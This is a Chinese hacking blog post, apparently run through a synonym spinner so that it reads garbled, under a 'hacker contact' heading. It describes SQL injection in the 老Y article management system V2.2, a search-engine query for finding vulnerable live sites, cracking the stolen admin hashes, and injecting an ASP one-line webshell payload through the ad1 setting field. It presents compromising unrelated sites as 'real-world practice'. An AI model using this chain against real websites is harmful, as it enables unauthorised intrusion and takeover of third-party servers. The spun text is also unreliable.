免费黑客联系方式黑客24小时在线联系

有同伙让我协助给他们公司的网站检查下安全性,在准许了同伙之后。笔者打开同伙公司网站看了一下,发现是用老Y文章治理系统V2.2,下面就最先对其举行进一步的剖析。   剖析对像:老Y文章治理系统 V2.2  (一)前期剖析  由于该套系统是ASP+ACCESS,可能对于我们来说就有许多的限制,不像MSSQL,MYSQL有那么多的扩展和内置函数使用,实在像这些as

有同伙让我协助给他们公司的网站检查下安全性,在准许了同伙之后。笔者打开同伙公司网站看了一下,发现是用老Y文章治理系统V2.2,下面就最先对其举行进一步的剖析。   剖析对像:老Y文章治理系统 V2.2  (一)前期剖析  由于该套系统是ASP+ACCESS,可能对于我们来说就有许多的限制,不像MSSQL,MYSQL有那么多的扩展和内置函数使用,实在像这些asp,php,jsp的动态网站注入,很大一方面是需要对种种数据库的领会。接下来,我们进入老Y文章治理系统官方网站看看:www.laoy*.cn,随便点个http://www.laoy*.cn/Class.asp?ID=4,并在后面加了个逗号,提醒说参数不合法,被过滤了,本想注册个用户再看看,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,以是照样下载源代码到本机进一步剖析。  (二)破绽剖析  由于代码不是许多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里实在完全可以只搜索含有关键词select的asp文件,再xinqing.asp中找到如下代码:ASP/Visual Basic代码action = Replace(Trim(Request.QueryString("action")),"'","") id = Replace(Trim(Request.QueryString("id")),"'","") typee = Replace(Trim(Request.QueryString("typee")),"'","") if action="show" then set rs=server.createobject("adodb.recordset") sql="Select * From Yao_XinQing Where cstr(ArticleID)="amp;id"" rs.open sql,conn,1,1 省略N多 信赖人人都能明了吧,id变量只是单纯的过滤了单引号就带入进了数据库,很明显产生了注入,简朴剖析下代码的意思,然厥后组织自己的 注入语句 URL?action=showamp;id= 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放到注入工具就可以获得治理员用户名和密码,固然也可以用我给人人提供的工具,直接爆出治理员信息,然后把密码拿到www.cmd5.com去破解,接下来的事就简朴。 三)网络实战   1. 通过关键字搜索老Y文章治理系统V2.2   既然“老Y文章治理系统V2.2”存在破绽,那么赶快去网络战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,以是我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,篇,如图1所示。   图1 通过关键字搜索老Y文章治理系统V2.2   2.前期准备工作   由于前面的许多网站已被挂马,人人照样只管选稍微靠后的网站举行测试,我用自己的空间http://www.ibk.com/来实验,直接用工具爆出用户名和密码上岸后台,可是发现数据库备份被删了,这可怎么办,突然想到由于设置文件(inc/config.asp)是asp,这样不就可以通过设置信息写如一句话木马,说着查看了下Admin_Setting.asp,发现除了ad1,ad2,ad3没有过滤,其他的参数由于过滤了双引号,那么我们就行使ad1参数来举行内陆提交一句户木马到服务器,将后台的页面保存为admin_setting.htm,如图2所示。   图2 缔造“有利条件”   3.获取Webshell   将提交地址改为http://www.ibk***.com/admin/Admin_Setting.asp?Action=Edit,将ad1的参数设为: "gt;lt; execute request("#")gt;lt;"  然后点击提交,提醒修改乐成,然后用客户端毗邻即可设置文件,行使小马传大马。最后将获得的Webshell截张图,如图3所示。 图3  

  • 发表于 2020-12-15 21:05
  • 阅读 ( 334 )
  • 分类:互联网

0 条评论

请先 登录 后评论
422559
422559

628 篇文章

你可能感兴趣的文章

相关问题